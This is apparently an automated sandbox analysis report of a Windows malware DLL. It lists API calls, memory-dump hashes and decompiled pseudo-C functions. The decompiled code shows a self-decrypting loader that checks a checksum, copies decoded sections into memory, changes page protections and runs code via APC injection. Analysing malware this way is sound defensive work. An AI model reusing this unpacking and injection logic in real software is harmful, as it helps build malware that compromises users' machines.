                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _Debug_pointer.LIBCPMTD ref: 6E1E67E7
                                    • __cftoe.LIBCMTD ref: 6E1E6898
                                      • Part of subcall function 6E1EF5B0: std::_Iterator_base::_Has_container.LIBCPMTD ref: 6E1EF5C9
                                      • Part of subcall function 6E1EF5B0: __invalid_parameter.LIBCMTD ref: 6E1EF610
                                      • Part of subcall function 6E1EF5B0: __invalid_parameter.LIBCMTD ref: 6E1EF689
                                      • Part of subcall function 6E1E7840: char_traits.LIBCPMTD ref: 6E1E7879
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: __invalid_parameter$Debug_pointerHas_containerIterator_base::___cftoechar_traitsstd::_
                                    • String ID: !%x
                                    • API String ID: 3269705901-1893981228
                                    • Opcode ID: 4ade868d87e73087c7a066b216cad3b24fb2e29f5dfc815ef46204e8c0716db1
                                    • Instruction ID: 0e1a1ce9822c7def3210d72e412f62947629cc8b27adf67772037e241cf2351c
                                    • Opcode Fuzzy Hash: 4ade868d87e73087c7a066b216cad3b24fb2e29f5dfc815ef46204e8c0716db1
                                    • Instruction Fuzzy Hash: 9B916CB0D0064CDFCB04CFE4C990BEEBBB9BF59304F508599E555A7281EB306A85DBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: 802bd2f8e7dae22120f17265a375fb4020ebd7e00cd6193d551c774f84e68a1d
                                    • Instruction ID: 00ad92646d65189c77129ce3e0691a92ca4cb2a3dd4c6337e7d30a784f6df227
                                    • Opcode Fuzzy Hash: 802bd2f8e7dae22120f17265a375fb4020ebd7e00cd6193d551c774f84e68a1d
                                    • Instruction Fuzzy Hash: F8616AB1D00A0DDBDB04CF95D954BEE77B8FF49300F008199E998A6281CB389AE6DB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: 3763dd0198a22e740968f8eb02dba5c95451a9edb26fb3d1f4c8fc898d2c966e
                                    • Instruction ID: d5a8e3bc618be1287ecc5bd62ea78413a07cd923f3bdea482ff38d842e3916fe
                                    • Opcode Fuzzy Hash: 3763dd0198a22e740968f8eb02dba5c95451a9edb26fb3d1f4c8fc898d2c966e
                                    • Instruction Fuzzy Hash: CB617871D00A0DDBDF04CF94D954BEEBBB8FF45300F008098E999A6281DB789AE5DB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: e54ac525aedc774d04310ef295481fe2038d3d938276f738b3e14c0f8cefa6d7
                                    • Instruction ID: b77d12692c4369d150a48c9bb582d05291def4b83e34f9e491d4731e94dcad50
                                    • Opcode Fuzzy Hash: e54ac525aedc774d04310ef295481fe2038d3d938276f738b3e14c0f8cefa6d7
                                    • Instruction Fuzzy Hash: FC515A71900A0DDFDB04CF94D954BEEB7B5FF85304F008199E998A6281DB389AE5DF11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: _swprintf_s
                                    • String ID: $$$$l
                                    • API String ID: 2332765921-1469801561
                                    • Opcode ID: 0b279fb5c3c0358f73807fa792b16f80f3baf16c4320b78a5ec25f64b2970c4d
                                    • Instruction ID: f0f48a7387850d4335e722cf3758a5417c27ffebdab657ef6f785032bf91ad95
                                    • Opcode Fuzzy Hash: 0b279fb5c3c0358f73807fa792b16f80f3baf16c4320b78a5ec25f64b2970c4d
                                    • Instruction Fuzzy Hash: 01517A70900A1DDFDB14CF94D954BEE7BB4FF89300F008198E599A6281CB389AE6DF15
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Maklocchr$_swprintf_s
                                    • String ID: (
                                    • API String ID: 86255702-3887548279
                                    • Opcode ID: 061df63c74322e05148636d3be89062f63ad5091920dcd82990aafd042ab1140
                                    • Instruction ID: 881665c91a49429de72ff9a651aec528b6c61d3d6478a72ef5c5947847155633
                                    • Opcode Fuzzy Hash: 061df63c74322e05148636d3be89062f63ad5091920dcd82990aafd042ab1140
                                    • Instruction Fuzzy Hash: 78419AB090060CDBCB04CFD5D955BEEBBB9FF48304F104619F8996B680DB34AA44DBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Maklocchr$_swprintf_s
                                    • String ID: (
                                    • API String ID: 86255702-3887548279
                                    • Opcode ID: c7fbc97dbdc015dc96fa869edc3a939eb05d3976410782802a33e775a52607cc
                                    • Instruction ID: fe40693d22f74aeb485edcc5613cb65535a7cdf642fe32877afd85a656b0f583
                                    • Opcode Fuzzy Hash: c7fbc97dbdc015dc96fa869edc3a939eb05d3976410782802a33e775a52607cc
                                    • Instruction Fuzzy Hash: 0341ACB090060CDBCB04CFD5D955BEEBBB8FF48304F104619F899AB680DB34AA58DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Mpunctshared_ptr
                                    • String ID:
                                    • API String ID: 3707918647-0
                                    • Opcode ID: 4f23e73f7b870a0eaba29616fb2add3cc25ae99a879677491f8fe58c52e2e854
                                    • Instruction ID: 147b03d82c728b756accec5b16f19731ac52b12236c2cad689237a467cfd004d
                                    • Opcode Fuzzy Hash: 4f23e73f7b870a0eaba29616fb2add3cc25ae99a879677491f8fe58c52e2e854
                                    • Instruction Fuzzy Hash: 758117B1900209DFDB14CFD4C894BEEB7B9BF58304F108699E519AB294DB30AE85DF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Locinfo::_Getdays.LIBCPMTD ref: 6E1EF1B9
                                    • _Maklocstr.LIBCPMTD ref: 6E1EF1CE
                                      • Part of subcall function 6E1ED120: _strlen.LIBCMT ref: 6E1ED133
                                    • std::_Locinfo::_Getmonths.LIBCPMTD ref: 6E1EF1E5
                                    • _Maklocstr.LIBCPMTD ref: 6E1EF1FA
                                      • Part of subcall function 6E1EB6F0: __Getdateorder.LIBCPMTD ref: 6E1EB6F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Locinfo::_Maklocstrstd::_$GetdateorderGetdaysGetmonths_strlen
                                    • String ID:
                                    • API String ID: 3206958346-0
                                    • Opcode ID: f9c0ca9df8dff7bee54103fbcaf2a7fe482731e8084a0e9ee1c70f9d30900e34
                                    • Instruction ID: 2a58355025094928a30b75318dbfcae314b97a60df71f8d97728a652a582adbe
                                    • Opcode Fuzzy Hash: f9c0ca9df8dff7bee54103fbcaf2a7fe482731e8084a0e9ee1c70f9d30900e34
                                    • Instruction Fuzzy Hash: D831EBB5D006099FCB04CF99C890AAEFBB5FB48314F10866AE815A7381D7359941CFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Debug_pointer__cftoe
                                    • String ID: !%x
                                    • API String ID: 1512280149-1893981228
                                    • Opcode ID: 62d51378dfc7a048a5687a297b70c798712217f1e1710925855b56c837466d7b
                                    • Instruction ID: ec181740c798826ef7df0350a3e58969fe88bf6597d8cd22ca2947a2d15225c7
                                    • Opcode Fuzzy Hash: 62d51378dfc7a048a5687a297b70c798712217f1e1710925855b56c837466d7b
                                    • Instruction Fuzzy Hash: A0516DB1D1424CDFCF04CFE8C850AEEBBB9AF54304F14861DE465AB281DB34AA49DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,000009B8,00003000,00000040,000009B8,6E2A14B8), ref: 6E2A1B1B
                                    • VirtualAlloc.KERNEL32(00000000,00000145,00003000,00000040,6E2A151A), ref: 6E2A1B52
                                    • VirtualAlloc.KERNEL32(00000000,00015306,00003000,00000040), ref: 6E2A1BB2
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2A1BE8
                                    • VirtualProtect.KERNEL32(6E1D0000,00000000,00000004,6E2A1A40), ref: 6E2A1CED
                                    • VirtualProtect.KERNEL32(6E1D0000,00001000,00000004,6E2A1A40), ref: 6E2A1D14
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2A1A40), ref: 6E2A1DE1
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2A1A40,?), ref: 6E2A1E37
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2A1E53
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.463547721.000000006E2A1000.00000040.00020000.sdmp, Offset: 6E2A1000, based on PE: false
                                    Similarity
                                    • API ID: Virtual$Protect$Alloc$Free
                                    • String ID:
                                    • API String ID: 2574235972-0
                                    • Opcode ID: ca2ef82b0c9608c8ff5b2c8c0fbd3fb87f1736770e9051fdb74c884e49a3ffb0
                                    • Instruction ID: 9cdd8f03d79b90c4b94653527a0fa4b639f4d47de3f74c517df81819a41e45c6
                                    • Opcode Fuzzy Hash: ca2ef82b0c9608c8ff5b2c8c0fbd3fb87f1736770e9051fdb74c884e49a3ffb0
                                    • Instruction Fuzzy Hash: C0D157B61087019FDB15EF58C890F6277B6FF48320B1941A4EE099F35AD770A854EBB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E6E1D17A7(intOrPtr _a4) {
                                    				char _v28;
                                    				struct _SYSTEMTIME _v44;
                                    				char _v48;
                                    				long _v52;
                                    				long _v56;
                                    				void* __edi;
                                    				long _t21;
                                    				int _t23;
                                    				long _t26;
                                    				long _t27;
                                    				long _t31;
                                    				intOrPtr _t39;
                                    				intOrPtr _t44;
                                    				signed int _t45;
                                    				void* _t50;
                                    				signed int _t54;
                                    				void* _t56;
                                    				intOrPtr* _t57;
                                    
                                    				_t21 = E6E1D146C();
                                    				_v52 = _t21;
                                    				if(_t21 != 0) {
                                    					L18:
                                    					return _t21;
                                    				} else {
                                    					goto L1;
                                    				}
                                    				do {
                                    					L1:
                                    					GetSystemTime( &_v44);
                                    					_t23 = SwitchToThread();
                                    					asm("cdq");
                                    					_t45 = 9;
                                    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                    					_t26 = E6E1D15A3(0, _t54); // executed
                                    					_v56 = _t26;
                                    					Sleep(_t54 << 5); // executed
                                    					_t21 = _v56;
                                    				} while (_t21 == 0xc);
                                    				if(_t21 != 0) {
                                    					goto L18;
                                    				}
                                    				_t27 = E6E1D1C12(_t45);
                                    				_v52 = _t27;
                                    				if(_t27 != 0) {
                                    					L16:
                                    					_t21 = _v52;
                                    					if(_t21 == 0xffffffff) {
                                    						_t21 = GetLastError();
                                    					}
                                    					goto L18;
                                    				}
                                    				if(_a4 != 0) {
                                    					L11:
                                    					_push(0);
                                    					_t56 = E6E1D1CA4(E6E1D16EC,  &_v28);
                                    					if(_t56 == 0) {
                                    						_v56 = GetLastError();
                                    					} else {
                                    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                    						_v56 = _t31;
                                    						if(_t31 == 0) {
                                    							GetExitCodeThread(_t56,  &_v56);
                                    						}
                                    						CloseHandle(_t56);
                                    					}
                                    					goto L16;
                                    				}
                                    				if(E6E1D1D7C(_t45,  &_v48) != 0) {
                                    					 *0x6e1d41b8 = 0;
                                    					goto L11;
                                    				}
                                    				_t44 = _v48;
                                    				_t57 = __imp__GetLongPathNameW;
                                    				_t50 =  *_t57(_t44, 0, 0);
                                    				if(_t50 == 0) {
                                    					L9:
                                    					 *0x6e1d41b8 = _t44;
                                    					goto L11;
                                    				}
                                    				_t15 = _t50 + 2; // 0x2
                                    				_t39 = E6E1D1C8F(_t50 + _t15);
                                    				 *0x6e1d41b8 = _t39;
                                    				if(_t39 == 0) {
                                    					goto L9;
                                    				} else {
                                    					 *_t57(_t44, _t39, _t50);
                                    					E6E1D136A(_t44);
                                    					goto L11;
                                    				}
                                    			}





















                                    0x6e1d17b3
                                    0x6e1d17bc
                                    0x6e1d17c0
                                    0x6e1d18c8
                                    0x6e1d18ce
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d17c6
                                    0x6e1d17c6
                                    0x6e1d17cb
                                    0x6e1d17d1
                                    0x6e1d17e0
                                    0x6e1d17e1
                                    0x6e1d17e4
                                    0x6e1d17e7
                                    0x6e1d17f0
                                    0x6e1d17f4
                                    0x6e1d17fa
                                    0x6e1d17fe
                                    0x6e1d1805
                                    0x00000000
                                    0x00000000
                                    0x6e1d180b
                                    0x6e1d1812
                                    0x6e1d1816
                                    0x6e1d18b9
                                    0x6e1d18b9
                                    0x6e1d18c0
                                    0x6e1d18c2
                                    0x6e1d18c2
                                    0x00000000
                                    0x6e1d18c0
                                    0x6e1d181f
                                    0x6e1d1872
                                    0x6e1d1872
                                    0x6e1d1883
                                    0x6e1d1887
                                    0x6e1d18b5
                                    0x6e1d1889
                                    0x6e1d188c
                                    0x6e1d1894
                                    0x6e1d1898
                                    0x6e1d18a0
                                    0x6e1d18a0
                                    0x6e1d18a7
                                    0x6e1d18a7
                                    0x00000000
                                    0x6e1d1887
                                    0x6e1d182d
                                    0x6e1d186c
                                    0x00000000
                                    0x6e1d186c
                                    0x6e1d182f
                                    0x6e1d1833
                                    0x6e1d183e
                                    0x6e1d1842
                                    0x6e1d1864
                                    0x6e1d1864
                                    0x00000000
                                    0x6e1d1864
                                    0x6e1d1844
                                    0x6e1d1849
                                    0x6e1d1850
                                    0x6e1d1855
                                    0x00000000
                                    0x6e1d1857
                                    0x6e1d185a
                                    0x6e1d185d
                                    0x00000000
                                    0x6e1d185d

                                    APIs
                                      • Part of subcall function 6E1D146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1D17B8,74B063F0,00000000), ref: 6E1D147B
                                      • Part of subcall function 6E1D146C: GetVersion.KERNEL32 ref: 6E1D148A
                                      • Part of subcall function 6E1D146C: GetCurrentProcessId.KERNEL32 ref: 6E1D1499
                                      • Part of subcall function 6E1D146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1D14B2
                                    • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E1D17CB
                                    • SwitchToThread.KERNEL32 ref: 6E1D17D1
                                      • Part of subcall function 6E1D15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1D15F9
                                      • Part of subcall function 6E1D15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1D17EC), ref: 6E1D168B
                                      • Part of subcall function 6E1D15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1D16A6
                                    • Sleep.KERNELBASE(00000000,00000000), ref: 6E1D17F4
                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1D183C
                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1D185A
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1D16EC,?,00000000), ref: 6E1D188C
                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1D18A0
                                    • CloseHandle.KERNEL32(00000000), ref: 6E1D18A7
                                    • GetLastError.KERNEL32(6E1D16EC,?,00000000), ref: 6E1D18AF
                                    • GetLastError.KERNEL32 ref: 6E1D18C2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                    • String ID:
                                    • API String ID: 2280543912-0
                                    • Opcode ID: 2902bfb553768ef5fad6197d455ef5258f648e82ed7f64b18c31569fc59f8ce3
                                    • Instruction ID: b091289d621d174322de22b53acd1919daf3ca9cacf77227319901c01551651f
                                    • Opcode Fuzzy Hash: 2902bfb553768ef5fad6197d455ef5258f648e82ed7f64b18c31569fc59f8ce3
                                    • Instruction Fuzzy Hash: 0531D571A05B159BC750DFA5884899F77ECFF86354B204E2AF860C2140E730C9DDEBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                    				long _v8;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				char _t9;
                                    				void* _t10;
                                    				void* _t18;
                                    				void* _t23;
                                    				void* _t36;
                                    
                                    				_push(__ecx);
                                    				_t9 = _a8;
                                    				_v8 = 1;
                                    				if(_t9 == 0) {
                                    					_t10 = InterlockedDecrement(0x6e1d4188);
                                    					__eflags = _t10;
                                    					if(_t10 == 0) {
                                    						__eflags =  *0x6e1d418c;
                                    						if( *0x6e1d418c != 0) {
                                    							_t36 = 0x2328;
                                    							while(1) {
                                    								SleepEx(0x64, 1);
                                    								__eflags =  *0x6e1d4198;
                                    								if( *0x6e1d4198 == 0) {
                                    									break;
                                    								}
                                    								_t36 = _t36 - 0x64;
                                    								__eflags = _t36;
                                    								if(_t36 > 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							CloseHandle( *0x6e1d418c);
                                    						}
                                    						HeapDestroy( *0x6e1d4190);
                                    					}
                                    				} else {
                                    					if(_t9 == 1 && InterlockedIncrement(0x6e1d4188) == 1) {
                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                    						_t41 = _t18;
                                    						 *0x6e1d4190 = _t18;
                                    						if(_t18 == 0) {
                                    							L6:
                                    							_v8 = 0;
                                    						} else {
                                    							 *0x6e1d41b0 = _a4;
                                    							asm("lock xadd [eax], edi");
                                    							_push( &_a8);
                                    							_t23 = E6E1D1CA4(E6E1D1D32, E6E1D1EE0(_a12, 1, 0x6e1d4198, _t41));
                                    							 *0x6e1d418c = _t23;
                                    							if(_t23 == 0) {
                                    								asm("lock xadd [esi], eax");
                                    								goto L6;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}












                                    0x6e1d1e07
                                    0x6e1d1e13
                                    0x6e1d1e15
                                    0x6e1d1e18
                                    0x6e1d1e8e
                                    0x6e1d1e94
                                    0x6e1d1e96
                                    0x6e1d1e98
                                    0x6e1d1e9e
                                    0x6e1d1ea0
                                    0x6e1d1ea5
                                    0x6e1d1ea8
                                    0x6e1d1eb3
                                    0x6e1d1eb5
                                    0x00000000
                                    0x00000000
                                    0x6e1d1eb7
                                    0x6e1d1eba
                                    0x6e1d1ebc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d1ebc
                                    0x6e1d1ec4
                                    0x6e1d1ec4
                                    0x6e1d1ed0
                                    0x6e1d1ed0
                                    0x6e1d1e1a
                                    0x6e1d1e1b
                                    0x6e1d1e3b
                                    0x6e1d1e41
                                    0x6e1d1e43
                                    0x6e1d1e48
                                    0x6e1d1e84
                                    0x6e1d1e84
                                    0x6e1d1e4a
                                    0x6e1d1e52
                                    0x6e1d1e59
                                    0x6e1d1e63
                                    0x6e1d1e6f
                                    0x6e1d1e76
                                    0x6e1d1e7b
                                    0x6e1d1e80
                                    0x00000000
                                    0x6e1d1e80
                                    0x6e1d1e7b
                                    0x6e1d1e48
                                    0x6e1d1e1b
                                    0x6e1d1edd

                                    APIs
                                    • InterlockedIncrement.KERNEL32(6E1D4188), ref: 6E1D1E26
                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1D1E3B
                                      • Part of subcall function 6E1D1CA4: CreateThread.KERNELBASE ref: 6E1D1CBB
                                      • Part of subcall function 6E1D1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1D1CD0
                                      • Part of subcall function 6E1D1CA4: GetLastError.KERNEL32(00000000), ref: 6E1D1CDB
                                      • Part of subcall function 6E1D1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1D1CE5
                                      • Part of subcall function 6E1D1CA4: CloseHandle.KERNEL32(00000000), ref: 6E1D1CEC
                                      • Part of subcall function 6E1D1CA4: SetLastError.KERNEL32(00000000), ref: 6E1D1CF5
                                    • InterlockedDecrement.KERNEL32(6E1D4188), ref: 6E1D1E8E
                                    • SleepEx.KERNEL32(00000064,00000001), ref: 6E1D1EA8
                                    • CloseHandle.KERNEL32 ref: 6E1D1EC4
                                    • HeapDestroy.KERNEL32 ref: 6E1D1ED0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                    • String ID:
                                    • API String ID: 2110400756-0
                                    • Opcode ID: 2b2c1110b43f65c27fe819df1ce12a688aee7d2006a8c06894a5467fd1e42831
                                    • Instruction ID: 368bcd1058eac8a494b88ba8947e99def6055484096c9fefdd2573d8e68d6ccb
                                    • Opcode Fuzzy Hash: 2b2c1110b43f65c27fe819df1ce12a688aee7d2006a8c06894a5467fd1e42831
                                    • Instruction Fuzzy Hash: 53219035B01609FFDB418FEECC88A4A7BACFB663607608529E515D3140E734998EBB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D1CA4(long _a4, DWORD* _a12) {
                                    				_Unknown_base(*)()* _v0;
                                    				void* _t4;
                                    				long _t6;
                                    				long _t11;
                                    				void* _t13;
                                    
                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1d41cc, 0, _a12); // executed
                                    				_t13 = _t4;
                                    				if(_t13 != 0) {
                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                    					if(_t6 == 0) {
                                    						_t11 = GetLastError();
                                    						TerminateThread(_t13, _t11);
                                    						CloseHandle(_t13);
                                    						_t13 = 0;
                                    						SetLastError(_t11);
                                    					}
                                    				}
                                    				return _t13;
                                    			}








                                    0x6e1d1cbb
                                    0x6e1d1cc1
                                    0x6e1d1cc5
                                    0x6e1d1cd0
                                    0x6e1d1cd8
                                    0x6e1d1ce1
                                    0x6e1d1ce5
                                    0x6e1d1cec
                                    0x6e1d1cf3
                                    0x6e1d1cf5
                                    0x6e1d1cfb
                                    0x6e1d1cd8
                                    0x6e1d1cff

                                    APIs
                                    • CreateThread.KERNELBASE ref: 6E1D1CBB
                                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1D1CD0
                                    • GetLastError.KERNEL32(00000000), ref: 6E1D1CDB
                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1D1CE5
                                    • CloseHandle.KERNEL32(00000000), ref: 6E1D1CEC
                                    • SetLastError.KERNEL32(00000000), ref: 6E1D1CF5
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.462896399.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000003.00000002.462865338.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462921936.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462943765.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000003.00000002.462959006.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                    • String ID:
                                    • API String ID: 3832013932-0
                                    • Opcode ID: 4066340a42ac7d6fc6d071a386dbcdd346ba81020130e0ae233a2b4e76299f53
                                    • Instruction ID: d0e6ce603a74b2c32c49d3ae4a10fb1c021b7ba32590aecb1dac841decf26725
                                    • Opcode Fuzzy Hash: 4066340a42ac7d6fc6d071a386dbcdd346ba81020130e0ae233a2b4e76299f53
                                    • Instruction Fuzzy Hash: 28F01C36207A25BBDB125BA09C4CF5FBF69FB0A751F04C514FA0991150C7218816BBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E6E1D15A3(void* __edi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				unsigned int _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				void* _v36;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				intOrPtr _t39;
                                    				void* _t46;
                                    				intOrPtr _t47;
                                    				intOrPtr _t50;
                                    				signed int _t59;
                                    				signed int _t61;
                                    				intOrPtr _t66;
                                    				intOrPtr _t77;
                                    				void* _t78;
                                    				signed int _t80;
                                    
                                    				_t77 =  *0x6e1d41b0;
                                    				_t39 = E6E1D1A4B(_t77,  &_v20,  &_v12);
                                    				_v16 = _t39;
                                    				if(_t39 == 0) {
                                    					asm("sbb ebx, ebx");
                                    					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                    					_t78 = _t77 + _v20;
                                    					_v36 = _t78;
                                    					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                    					_v24 = _t46;
                                    					if(_t46 == 0) {
                                    						_v16 = 8;
                                    					} else {
                                    						_t61 = 0;
                                    						if(_t59 <= 0) {
                                    							_t47 =  *0x6e1d41cc;
                                    						} else {
                                    							_t66 = _a4;
                                    							_t50 = _t46 - _t78;
                                    							_t11 = _t66 + 0x6e1d5137; // 0x6e1d5137
                                    							_v28 = _t50;
                                    							_v32 = _t50 + _t11;
                                    							_v8 = _t78;
                                    							while(1) {
                                    								asm("movsd");
                                    								asm("movsd");
                                    								asm("movsd");
                                    								_t19 = _t61 + 1; // 0x2
                                    								_t80 = _t19;
                                    								E6E1D1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                    								_t64 = _v32;
                                    								_v8 = _v8 + 0x1000;
                                    								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                    								_t61 = _t80;
                                    								 *0x6e1d41cc = _t47;
                                    								if(_t61 >= _t59) {
                                    									break;
                                    								}
                                    								_t50 = _v28;
                                    							}
                                    						}
                                    						if(_t47 != 0x63699bc3) {
                                    							_v16 = 0xc;
                                    						} else {
                                    							memcpy(_v36, _v24, _v12);
                                    						}
                                    						VirtualFree(_v24, 0, 0x8000); // executed
                                    					}
                                    				}
                                    				return _v16;
                                    			}























                                    0x6e1d15aa
                                    0x6e1d15ba
                                    0x6e1d15c1
                                    0x6e1d15c4
                                    0x6e1d15d9
                                    0x6e1d15e0
                                    0x6e1d15e5
                                    0x6e1d15f6
                                    0x6e1d15f9
                                    0x6e1d1601
                                    0x6e1d1604
                                    0x6e1d16ae
                                    0x6e1d160a
                                    0x6e1d160a
                                    0x6e1d160e
                                    0x6e1d1676
                                    0x6e1d1610
                                    0x6e1d1610
                                    0x6e1d1613
                                    0x6e1d1615
                                    0x6e1d161d
                                    0x6e1d1620
                                    0x6e1d1623
                                    0x6e1d162b
                                    0x6e1d1633
                                    0x6e1d1634
                                    0x6e1d1635
                                    0x6e1d163c
                                    0x6e1d163c
                                    0x6e1d1650
                                    0x6e1d1655
                                    0x6e1d165e
                                    0x6e1d1665
                                    0x6e1d1668
                                    0x6e1d166c
                                    0x6e1d1671
                                    0x00000000
                                    0x00000000
                                    0x6e1d1628
